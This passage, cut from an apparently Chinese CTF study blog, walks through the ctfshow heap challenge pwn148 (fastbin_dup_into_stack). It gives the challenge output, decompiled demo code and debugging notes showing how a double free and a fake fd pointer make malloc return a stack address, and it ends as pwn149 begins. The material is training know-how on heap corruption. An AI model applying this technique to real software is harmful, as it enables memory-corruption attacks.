src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"422\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-34-1024x422.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-759\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uafd4d754\">ok\uff0c\u5c31\u5230\u8fd9\u91cc<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"Ocw2D\">4\u3001pwn148<\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-35-1024x746.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"746\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-35-1024x746.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-760\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u840313f4\">fastbin_dup_into_stack,\u7ee7\u7eed\u5b66\u4e60\u65b0\u4e1c\u897f\uff0c\u5148\u770b\u4e00\u4e0bcheckseck<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-36-1024x427.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"427\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-36-1024x427.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-761\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u2a42e815\">\u8bbe\u7f6e\u4e86\u7ec8\u7aef\u80cc\u666f\u989c\u8272\u548c\u900f\u660e\u5ea6hh,<\/p>\n\n\n\n<p id=\"ufacdc54b\">\u7136\u540e\u6211\u4eec\u770b\u770b\u6f14\u793a<\/p>\n\n\n\n<p id=\"u2a42e815\">\u8bbe\u7f6e\u4e86\u7ec8\u7aef\u80cc\u666f\u989c\u8272\u548c\u900f\u660e\u5ea6hh,<\/p>\n\n\n\n<p id=\"ufacdc54b\">\u7136\u540e\u6211\u4eec\u770b\u770b\u6f14\u793a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>faetong@faetong-virtual-machine:~\/pwnit$ nc pwn.challenge.ctf.show 28163\n    \u2584\u2584\u2584\u2584   \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584  \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584            \u2584\u2584                           \n  \u2588\u2588\u2580\u2580\u2580\u2580\u2588  \u2580\u2580\u2580\u2588\u2588\u2580\u2580\u2580  \u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580            \u2588\u2588                           \n \u2588\u2588\u2580          \u2588\u2588     \u2588\u2588        \u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2584  \u2588\u2588\u2584\u2588\u2588\u2588\u2588\u2584   \u2584\u2588\u2588\u2588\u2588\u2584  \u2588\u2588      \u2588\u2588\n \u2588\u2588           \u2588\u2588     \u2588\u2588\u2588\u2588\u2588\u2588\u2588   \u2588\u2588\u2584\u2584\u2584\u2584 \u2580  \u2588\u2588\u2580   \u2588\u2588  \u2588\u2588\u2580  \u2580\u2588\u2588 \u2580\u2588  \u2588\u2588  \u2588\u2580\n \u2588\u2588\u2584          \u2588\u2588     \u2588\u2588         \u2580\u2580\u2580\u2580\u2588\u2588\u2584  \u2588\u2588    \u2588\u2588  \u2588\u2588    \u2588\u2588  \u2588\u2588\u2584\u2588\u2588\u2584\u2588\u2588 \n  \u2588\u2588\u2584\u2584\u2584\u2584\u2588     \u2588\u2588     \u2588\u2588        \u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588  \u2588\u2588    \u2588\u2588  \u2580\u2588\u2588\u2584\u2584\u2588\u2588\u2580  \u2580\u2588\u2588  \u2588\u2588\u2580 \n    \u2580\u2580\u2580\u2580      \u2580\u2580     \u2580\u2580         \u2580\u2580\u2580\u2580\u2580\u2580   \u2580\u2580    \u2580\u2580    \u2580\u2580\u2580\u2580     \u2580\u2580  \u2580\u2580  \n    * *************************************                           \n    * Classify: CTFshow --- PWN --- \u5165\u95e8                              \n    * Type  : Heap_Exploitation                                       \n    * Site  : https:\/\/ctf.show\/                                       \n    * Hint  : Fastbin_dup_into_stack -- Double free                   \n    * *************************************                           \n\u901a\u8fc7\u6b3a\u9a97 malloc \u4f7f\u5f97\u8fd4\u56de\u4e00\u4e2a\u6307\u5411\u53d7\u63a7\u4f4d\u7f6e\u7684\u6307\u9488\uff08\u672c\u4f8b\u4e3a\u6808\u4e0a\uff09\n\u901a\u8fc7 malloc \u7533\u8bf7\u5230 0x7ffed3cf1770.\n\u5148\u7533\u8bf73 \u4e2a chunk\nchunk a: 0x2362010\nchunk b: 0x2362030\nchunk c: 0x2362050\nfree \u6389 chunk a\n\u5982\u679c\u8fd8\u5bf9 0x2362010 \u8fdb\u884c free, \u7a0b\u5e8f\u4f1a\u5d29\u6e83\u3002\u56e0\u4e3a 0x2362010 \u73b0\u5728\u662f fastbin \u7684\u7b2c\u4e00\u4e2a\n\u5148\u5bf9 b 0x2362030 \u8fdb\u884c free\n\u63a5\u4e0b\u6765\u5c31\u53ef\u4ee5\u5bf9 0x2362010 \u518d\u6b21\u8fdb\u884c free \u4e86, \u73b0\u5728\u5df2\u7ecf\u4e0d\u662f\u5b83\u5728 fastbin \u7684\u7b2c\u4e00\u4e2a\u4e86\n\u73b0\u5728 fastbin \u7684\u94fe\u8868\u662f &#91; 0x2362010, 0x2362030, 0x2362010 ] \u63a5\u4e0b\u6765\u901a\u8fc7\u4fee\u6539 0x2362010 \u4e0a\u7684\u5185\u5bb9\u6765\u8fdb\u884c\u653b\u51fb.\n\u7b2c\u4e00\u6b21 malloc(8): 0x2362010\n\u7b2c\u4e8c\u6b21 malloc(8): 0x2362030\n\u73b0\u5728 fastbin \u8868\u4e2d\u53ea\u5269 &#91; 0x2362010 ] \u4e86\n\u63a5\u4e0b\u6765\u5f80 0x2362010 \u6808\u4e0a\u5199\u4e00\u4e2a\u5047\u7684 size\uff0c\u8fd9\u6837 malloc \u4f1a\u8bef\u4ee5\u4e3a\u90a3\u91cc\u6709\u4e00\u4e2a\u7a7a\u95f2\u7684 chunk\uff0c\u4ece\u800c\u7533\u8bf7\u5230\u6808\u4e0a\u53bb\n\u73b0\u5728\u8986\u76d6 0x2362010 \u524d\u9762\u7684 8 \u5b57\u8282\uff0c\u4fee\u6539 fd \u6307\u9488\u6307\u5411 stack_var \u524d\u9762 0x20 \u7684\u4f4d\u7f6e\n\u7b2c\u4e09\u6b21 malloc(8): 0x2362010, \u628a\u6808\u5730\u5740\u653e\u5230 fastbin \u94fe\u8868\u4e2d\n\u8fd9\u4e00\u6b21 malloc(8) \u5c31\u7533\u8bf7\u5230\u4e86\u6808\u4e0a\u53bb: 0x7ffed3cf1770\n<\/code><\/pre>\n\n\n\n<p id=\"ufe4af0c3\">\u8fd8\u662f\u8fd0\u7528\u4e86double free\uff0c\u7136\u540e\u5f80fastbin0x2362030\u7684\u6808\u4e0a\u5199\u4e86\u4e00\u4e2a\u5047size\u6b3a\u9a97\u4e86malloc<\/p>\n\n\n\n<p id=\"u1514694d\">double free\u4e4b\u540e\u7684fastbin:<\/p>\n\n\n\n<p id=\"u1797b0b0\">main_arena-&gt;chunk[0]-&gt;chunk[1]-&gt;chunk[0]-&gt;0<\/p>\n\n\n\n<p id=\"ud28550ad\">\u73b0\u5728\u9488\u5bf90\u8fdb\u884c\u653b\u51fb\uff0c\u73b0\u5728\u628achunk[0]\u548cchunk[1]\u7533\u8bf7\u8d70<\/p>\n\n\n\n<p id=\"udec364ae\">main_arena-&gt;chunk[0]-&gt;0<\/p>\n\n\n\n<p id=\"u10cbaf8b\">\u63a5\u4e0b\u6765\u7684\u64cd\u4f5c\u628afastbin\u53d8\u4e3a\uff1a<\/p>\n\n\n\n<p id=\"ud547396e\">main_arena-&gt;chunk[0]-&gt;stack_addr<\/p>\n\n\n\n<p id=\"u78bdf586\">\u7136\u540e\u628achunk[0]\u548cstack_addr\u6240\u5728chunk\u7533\u8bf7\u8d70\uff0c\u83b7\u5f97\u4e86\u5728\u6808\u4e0a\u5199\u7684\u6743\u9650<\/p>\n\n\n\n<p id=\"u04e1ecc5\">\u8fd9\u91cc\u7684\u64cd\u4f5c\u5176\u5b9e\u4e0d\u662f\u592a\u61c2\uff0c\u6211\u4eec\u770b\u770b\u4ee3\u7801\u624d\u80fd\u77e5\u9053<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>void __cdecl demo()\n{\n  __int64 v0; \/\/ &#91;rsp+0h] &#91;rbp-50h] BYREF\n  unsigned __int64 stack_var; \/\/ &#91;rsp+8h] &#91;rbp-48h]\n  char *AAAAAAAA; \/\/ &#91;rsp+10h] &#91;rbp-40h] BYREF\n  char *b; \/\/ &#91;rsp+18h] &#91;rbp-38h]\n  char *c; \/\/ &#91;rsp+20h] &#91;rbp-30h]\n  unsigned __int64 *d; \/\/ &#91;rsp+28h] &#91;rbp-28h]\n  char *e; \/\/ &#91;rsp+30h] &#91;rbp-20h]\n  char *f; \/\/ &#91;rsp+38h] &#91;rbp-18h]\n  char *g; \/\/ &#91;rsp+40h] &#91;rbp-10h]\n  unsigned __int64 v9; \/\/ &#91;rsp+48h] &#91;rbp-8h]\n\n  v9 = __readfsqword(0x28u);\n  fwrite(&amp;ptr_, 1u, 0x57u, stderr);\n  fprintf(stderr, &amp;format_, &amp;AAAAAAAA);\n  fwrite(&amp;ptr__0, 1u, 0x15u, stderr);\n  \/\/\u521b\u5efachunk&#91;0]\n  AAAAAAAA = (char *)malloc(8u);   \n  strcpy(AAAAAAAA, \"AAAAAAAA\");\n  \/\/\u521b\u5efachunk&#91;1]\n  b = (char *)malloc(8u);\n  strcpy(b, \"BBBBBBBB\");\n  c = (char *)malloc(8u);\n  \/\/\u521b\u5efachunk&#91;2]\n  strcpy(c, \"CCCCCCCC\");\n  fprintf(stderr, \"chunk a: %p\\n\", AAAAAAAA);\n  fprintf(stderr, \"chunk b: %p\\n\", b);\n  fprintf(stderr, \"chunk c: %p\\n\", c);\n  fwrite(&amp;ptr__1, 1u, 0x11u, stderr);\n  \/\/\u91ca\u653echunk&#91;0]\n  free(AAAAAAAA);\n  fprintf(stderr, &amp;format__0, AAAAAAAA, AAAAAAAA);\n  fprintf(stderr, &amp;format__1, b);\n  \/\/\u91ca\u653echunk&#91;1]\n  free(b);\n  fprintf(stderr, &amp;format__2, AAAAAAAA);\n  \/\/\u518d\u6b21\u91ca\u653echunk&#91;0]\uff0cglibc\u4e0d\u4f1a\u68c0\u67e5\u7b2c\u4e8c\u6b21free\u540c\u4e00\u4e2a\u6307\u9488\n  free(AAAAAAAA);\n  fprintf(stderr, &amp;format__3, AAAAAAAA, b, AAAAAAAA, AAAAAAAA);\n  \/\/\u7533\u8bf7\u56dechunnk&#91;0],d\u6765\u63a7\u5236malloc\u7684\u8fd4\u56de\u503c\n  d = (unsigned __int64 *)malloc(8u);\n  fprintf(stderr, &amp;format__4, d);\n  \/\/\u7533\u8bf7\u56dechunk&#91;1]\n  e = (char *)malloc(8u);\n  strcpy(e, \"EEEEEEEE\");\n  fprintf(stderr, &amp;format__5, e);\n  fprintf(stderr, &amp;format__6, AAAAAAAA);\n  fprintf(stderr, &amp;format__7, AAAAAAAA);\n  stack_var = 32;\n  fprintf(stderr, &amp;format__8, AAAAAAAA);\n  \/\/\u4e0b\u9762\u5199\u5165\u4e86fake fd\uff0c\u662f\u6808\u5730\u5740\n  *d = (unsigned __int64)&amp;v0;\n  f = (char *)malloc(8u);\n  strcpy(f, \"FFFFFFFF\");\n  fprintf(stderr, &amp;format__9, f);\n  g = (char *)malloc(8u);\n  strcpy(g, \"GGGGGGGG\");\n  fprintf(stderr, &amp;format__10, g);\n}<\/code><\/pre>\n\n\n\n<p id=\"u82c1aeb7\">\u4e0b\u9762\u6211\u4eec\u6765\u8bd5\u7740\u8c03\u8bd5\u770b\u770b\u8fd9\u4e2a\u8fc7\u7a0b<\/p>\n\n\n\n<p id=\"ud1c69f25\">\u9996\u5148\u662f\u4e09\u4e2a\u5bf9\u7a7a\u95f4\u7684\u5206\u914d<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-37-1024x409.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"409\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-37-1024x409.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-762\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u5728\u4e09\u4e2amalloc\u6267\u884c\u5b8c\u4ee5\u540e\u6211\u4eec\u770b\u5230chunk\u5df2\u7ecf\u521b\u5efa\u597d\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-38-919x1024.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"919\" height=\"1024\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-38-919x1024.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-763\"  sizes=\"auto, (max-width: 919px) 100vw, 919px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-39-1024x449.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"449\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-39-1024x449.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-764\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u63a5\u4e0b\u6765\u5c31\u662f\u6784\u6210fastbin:main_arena->chunk[0]->chunk[1]->chunk[0]<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-40-864x1024.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"864\" height=\"1024\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-40-864x1024.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-765\"  sizes=\"auto, (max-width: 864px) 100vw, 864px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u8fd9\u6761\u94fe\u5f88\u660e\u663e\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-41.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"919\" height=\"601\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-41.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-766\"  sizes=\"auto, (max-width: 919px) 100vw, 919px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u63a5\u4e0b\u6765\u662f\u7533\u8bf7\u56dechunk[0]<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-42-1024x588.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"588\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-42-1024x588.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-767\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ua0f3148e\">main_arena-&gt;chunk[1]-&gt;chunk[0]<\/p>\n\n\n\n<p id=\"u7a512229\">\u63a5\u4e0b\u6765\u7533\u8bf7\u56dechunk[1]\u7136\u540e\u5199\u5165\u5047fd<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-43-1024x257.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"257\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-43-1024x257.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-768\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u8fd9\u4e2a\u662f\u5199\u5165F\u4ee5\u540e\uff0c\u9a6c\u4e0a\u8981\u5199\u5165G<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-44-1024x392.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"392\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-44-1024x392.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-769\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-45-1024x326.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"326\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-45-1024x326.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-770\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u6b64\u65f6\u5df2\u7ecf\u53ef\u4ee5\u5728\u6808\u4e0a\u5199\u5165<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-46-1024x948.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"948\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-46-1024x948.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-771\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><br>5\u3001pwn149\uff08fastbin_dup_consolidate\uff09<\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-47-1024x594.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"594\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-47-1024x594.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-772\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>checksec<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-48-1024x441.png'><img class=\"lazyload lazyload-style-1\" 